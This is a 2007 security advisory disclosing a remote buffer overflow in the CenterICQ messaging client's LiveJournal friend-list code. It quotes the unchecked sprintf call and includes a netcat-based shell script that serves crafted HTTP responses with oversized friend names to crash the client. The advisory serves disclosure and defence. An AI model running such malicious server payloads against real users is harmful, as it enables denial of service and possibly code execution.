======================================================================== TK53 Advisory #1 01/07/2007 - CenterICQ remote DoS buffer overflow in Livejournal handling ======================================================================== * Authors: Lolek of TK53 , Roflek of TK53 * Affected program: CenterICQ (http://thekonst.net/centericq/) * Affected versions: 4.9.11 - 4.21.0 * Overwiew: CenterICQ contains support for LiveJournal (http://www.livejournal.com/), such as posting to your own blog, reading other blogs' RSS feeds, and other community-related functions, such as showing whether a user has added or removed your own users to/from the friend list, all via a unified HTTP interface provided by LiveJournal. The latter functionality is vulnerable to a buffer overflow and possible remote code execution. == Vulnerability Details == $SOURCE/src/hooks/ljhook.cc: char buf[512]; ... if(find(friendof.begin(), friendof.end(), in->first) == friendof.end()) { friendof.push_back(in->first); if(!foempty) { bd = (string) "http://" + conf.getourid(proto).server + "/users/" + in->first; sprintf(buf, _("The user %s (%s) has added you to his/her friend list\n\nJournal address: %s"), in->first.c_str(), in->second.c_str(), bd.c_str()); em.store(imnotification(self, buf)); } } ... CenterICQ regularly checks the server for the friends list (#define PERIOD_FRIENDS 3600, which means that the check is done every 3600 seconds). If a user is in the friend list of at least one user, and another user adds the user to his friend list, foempty gets true, and the sprintf is called, leading to a buffer overflow in buf. The length of the username (in->first) or the realname (in->second) are totally unchecked. This means that this will overflow if: 2*length(username) + length(realname) + length(string literals) >= sizeof(buf) The only reason why this is not exploitable with the official LiveJournal servers is because LiveJournal has a length restriction on both the username (15 characters) and the real name (50 characters). But since the server that is used for communication is configurable within CenterICQ, and since LiveJournal provides its backend under the GPL, the risk for buffer overflow and exploitation does exist. == Proof of Concept Exploit == add the following to your ~/.centericq/conf lj_nick randomname lj_pass randompass lj_server localhost:8000 lj_status o lj_importfriends 1 Start the following shell script, then CenterICQ and be patient because of PERIOD_FRIENDS (3600 seconds, 1 hour) time (or make it 10 or whatever in the code and recompile). The following shell script is a very simple proof-of-concept demonstration of the buffer overflow: --- SNIP --- #!/bin/sh cat > req1.txt << __EOF HTTP/1.0 200 OK Date: Sat, 06 Jan 2007 11:51:50 GMT Server: Apache Set-Cookie: ljuniq=fGKzZta9CPnvvx2:1168084310:hbx0; expires=Wednesday, 07-Mar-2007 11:51:50 GMT; domain=.livejournal.com; path=/ Content-length: 558 Connection: close Content-Type: text/plain friend_1_bg #ffffff friend_1_fg #000000 friend_1_name jwz friend_1_user jwz friend_2_bg #ffffff friend_2_fg #000000 friend_2_name LJ Maintenance friend_2_type community friend_2_user lj_maintenance friend_3_bg #ffffff friend_3_fg #000000 friend_3_name LJ Spotlight friend_3_type community friend_3_user lj_spotlight friend_4_bg #ffffff friend_4_fg #000000 friend_4_name LiveJournal News friend_4_type news friend_4_user news friend_count 4 friendof_1_bg #ffffff friendof_1_fg #000000 friendof_1_name roflek friendof_1_user roflek friendof_count 1 success OK __EOF cat > req2.txt << __EOF HTTP/1.0 200 OK Date: Sat, 06 Jan 2007 11:51:50 GMT Server: Apache Set-Cookie: ljuniq=fGKzZta9CPnvvx2:1168084310:hbx0; expires=Wednesday, 07-Mar-2007 11:51:50 GMT; domain=.livejournal.com; path=/ Content-length: 558 Connection: close Content-Type: text/plain friend_1_bg #ffffff friend_1_fg #000000 friend_1_name jwz friend_1_user jwz friend_2_bg #ffffff friend_2_fg #000000 friend_2_name LJ Maintenance friend_2_type community friend_2_user lj_maintenance friend_3_bg #ffffff friend_3_fg #000000 friend_3_name LJ Spotlight friend_3_type community friend_3_user lj_spotlight friend_4_bg #ffffff friend_4_fg #000000 friend_4_name LiveJournal News friend_4_type news friend_4_user news friend_count 4 friendof_1_bg #ffffff friendof_1_fg #000000 friendof_1_name roflek friendof_1_user roflek friendof_2_bg #ffffff friendof_2_fg #000000 friendof_2_name foo friendof_2_user foo friendof_count 2 success OK __EOF cat > req3.txt << __EOF HTTP/1.0 200 OK Date: Sat, 06 Jan 2007 11:51:50 GMT Server: Apache Set-Cookie: ljuniq=fGKzZta9CPnvvx2:1168084310:hbx0; expires=Wednesday, 07-Mar-2007 11:51:50 GMT; domain=.livejournal.com; path=/ Content-length: 558 Connection: close Content-Type: text/plain friend_1_bg #ffffff friend_1_fg #000000 friend_1_name jwz friend_1_user jwz friend_2_bg #ffffff friend_2_fg #000000 friend_2_name LJ Maintenance friend_2_type community friend_2_user lj_maintenance friend_3_bg #ffffff friend_3_fg #000000 friend_3_name LJ Spotlight friend_3_type community friend_3_user lj_spotlight friend_4_bg #ffffff friend_4_fg #000000 friend_4_name LiveJournal News friend_4_type news friend_4_user news friend_count 4 friendof_1_bg #ffffff friendof_1_fg #000000 friendof_1_name roflek friendof_1_user roflek friendof_2_bg #ffffff friendof_2_fg #000000 friendof_2_name lolek friendof_2_user lolek friendof_3_bg #ffffff friendof_3_fg #000000 friendof_3_name AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA friendof_3_user AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA friendof_count 3 success OK __EOF netcat -lp 8000 < req1.txt netcat -lp 8000 < req2.txt netcat -lp 8000 < req3.txt --- SNIP ---